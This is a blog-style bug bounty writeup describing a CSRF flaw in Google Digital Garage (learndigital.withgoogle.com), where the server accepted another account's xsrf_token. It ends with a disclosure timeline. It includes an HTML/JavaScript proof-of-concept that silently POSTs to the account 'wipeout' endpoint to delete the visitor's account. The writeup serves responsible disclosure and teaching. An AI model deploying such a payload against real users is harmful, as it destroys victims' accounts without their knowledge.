Google Bug Bounty: CSRF in learndigital.withgoogle.com

Hi everyone,
This is my first Google bug bounty writeups, I want to tell you about CSRF vulnerability on Google Digital Garage.

Have you ever heard of the Google Gigital Garage? an online courses from Google that is designed for you to grow your career or business, that’s a tagline from the website page of one of Google’s products.

TL;DR: a few months ago I read a writeup HERE about a vulnerability on google subdomain that is learndigital.withgoogle.com, then I tried to look around. In short, I found a CSRF vulnerability due to lack of CSRF token validation that lead to account deletion, etc.

What is CSRF?

Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same origin policy, which is designed to prevent different websites from interfering with each other.

Reproduces

I registered my account using my email to see more features. When I looked inside, I was very interested when I was on my profile page. I found “delete account” button. I immediately thought of CSRF and then I tried to capture the request using burp proxy, but Google uses the xsrf_token to protect each request.

Thinking for a while, I tried to make a second account as a victim. Then I tried to capture the request to delete account and replace the xsrf_token with the first account (attacker’s xsrf_token).

When I refresh the profile page in the browser…

See that tokens from other users will be accepted. I realize that Google cannot validate tokens properly at server side. So, CSRF protection is not implemented perfectly.

I tried to make a simple html code to try it in the browser

<!DOCTYPE html>
<html>
<head>
 <title>Google | CSRF PoC</title>
</head>
<body>
<center>
  <h1>CSRF PoC | Delete Account</h1>
  <script>
  const url = 'https://learndigital.withgoogle.com/digitalgarage/profile/wipeout';

  fetch(url, {
    method: 'POST',
    credentials: 'include',
    headers: {'Content-Type': 'application/x-www-form-urlencoded'},
    body: 'xsrf_token=<attacker_xsrf_token>'
  });
  </script>
  </center>
</body>
</html>

When execute the code, I get a perfect respone.
I quickly sent this issue to Google and got the confirmation of the bug:

I’m looking forward to sharing more of my adventures in the future, stay tuned!

Timeline:
  • Nov 16, 2019: Report to Google
  • Nov 18, 2019: Triaged
  • Nov 22, 2019: Google confirm that the report is duplicate

Share:

More Posts